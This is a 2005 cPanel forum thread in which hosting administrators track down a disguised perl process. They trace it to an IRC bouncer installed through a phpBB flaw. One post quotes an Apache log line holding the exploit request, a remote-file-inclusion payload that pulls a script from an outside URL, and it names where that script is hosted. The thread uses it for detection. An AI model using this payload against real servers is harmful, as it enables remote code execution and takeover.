The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

perl process --> /usr/local/firewall

Discussion in 'General Discussion' started by Def, Nov 8, 2005.

  1. Def

    Def Well-Known Member

    Joined:
    Feb 21, 2003
    Messages:
    63
    Likes Received:
    0
    Trophy Points:
    6
    Probably once a day I have a perl process that seems to get hung and causes loads to go up a bit. I do a ps -f <pid> and it shows as /usr/local/firewall . I don't see a firewall file or directory under /usr/local so I'm not sure what's going on with this. I end up killing the pid to get the loads back down and I/O wait back to normal again.

    Is this iptables hanging or some exploit. I've run rkhunter (found nothing) and checked /tmp and /dev/shm for anything out of the ordinary (found nothing). If this is actually my firewall that I'm killing what is the command to restart it?

    Thanks.
     
  2. DigiCrime

    DigiCrime Well-Known Member

    Joined:
    Nov 27, 2002
    Messages:
    399
    Likes Received:
    0
    Trophy Points:
    16
    Sure thats not an anti-dos module?
     
  3. Def

    Def Well-Known Member

    Joined:
    Feb 21, 2003
    Messages:
    63
    Likes Received:
    0
    Trophy Points:
    6
    Not sure. That's why I'm asking ;)
     
  4. acenetryan

    acenetryan Well-Known Member
    PartnerNOC

    Joined:
    Aug 21, 2005
    Messages:
    197
    Likes Received:
    1
    Trophy Points:
    18
    I have been seeing this as well.

    I am trying to locate the working directory for this script. If anyone has further insight, it would be appreciated.

    ps aux | grep firewall

    will give you the process ID.

    lsof | grep PID

    This shows the working directory of the process to be "/". I've searched most of the server and have been unable to find anything pertaining to the location of this script and how it gets run.

    I believe the process is an IRC daemon. One of the lines in the lsof shows:

    perl <PID> <USERNAME> 15u IPv4 64850345 TCP <SERVERNAME>:43528-><SOMEDOMAINNAME>:ircd (SYN_SENT)

    I've taken out sensitive information, but note the ircd at the end of the line.

    Anyone know any other way to locate the working directory of a script, this one seems to hide itself well.
     
  5. chirpy

    chirpy Well-Known Member

    Joined:
    Jun 15, 2002
    Messages:
    13,475
    Likes Received:
    20
    Trophy Points:
    38
    Location:
    Go on, have a guess
    It's probably best to use:

    lsof -p PID

    Which will more reliably list the information about the process. You can also look in /proc/PID/* for more details on the process.

    The most important bit of information is the user under which it runs. If it's running under nobody then you most likely have vulnerable PHP scripts in the server (make sure all those phpBB installs are running at least v2.0.18 all others are vulnerable to exploitation).

    Check common directories used by script exploits:

    /tmp
    /var/tmp
    /dev/shm
    /usr/local/apache/proxy/
     
  6. dv2support

    dv2support Member
    PartnerNOC

    Joined:
    Oct 9, 2002
    Messages:
    12
    Likes Received:
    0
    Trophy Points:
    1
  7. compunet2

    compunet2 Well-Known Member

    Joined:
    Feb 21, 2003
    Messages:
    310
    Likes Received:
    0
    Trophy Points:
    16
    Same here... the source isn't in any of the normal locations (/tmp, /tmp/var, etc.). Anyway to find the source file?
     
  8. derekg

    derekg Registered

    Joined:
    Oct 2, 2002
    Messages:
    4
    Likes Received:
    0
    Trophy Points:
    1
    It's an exploit

    It's a phpBB expoit. It installs and runs irc bouncer on your server. There is no such file as /usr/local/firewall on your server, so don't bother looking for it. Search your Apache logs for entries like this one:

    63.247.81.34 - - [10/Dec/2005:07:38:09 -0500] "GET /forums/viewtopic.php?t=70&highlight=%2527.$poster=include($_GET[m]).%2527&m=http://www.yatas.com/phpbb_private.txt?& HTTP/1.0" 200 12718 "http://www.google.nl/" "Mozilla/4.0 (modded by sirh0t **** Aleks)"

    At http://www.yatas.com/phpbb_private.txt?& you will find the script that does it.

    Now, I have upgraded phpBB to the lastest version through WHM, but it didn't help. It didn't help because the upgrade in WHM is broken, as it will not upgrade .php files which belong to phpBB under individual domains. The result of the upgrade is such, that after the upgrade, if you access any of the phpBB bulletins on your server, you will still see the old phpBB version number...

    For me getting rid of phpBB is not an option, because at least 15% of my users have it installed. Just deleting this bug-ridden piece of s..tware would be the best thing to do, but you know how users are...

    To the CPanel programmers: Can you PLEASE fix this so that when we upgrade phpBB installation from WHM, it REALLY upgrades it??? And I mean for ALL THE DOMAINS that are hosted on the server?

    Either that or a script we could run that would take care of all phpBB files under individual domains...
     
Loading...

Share This Page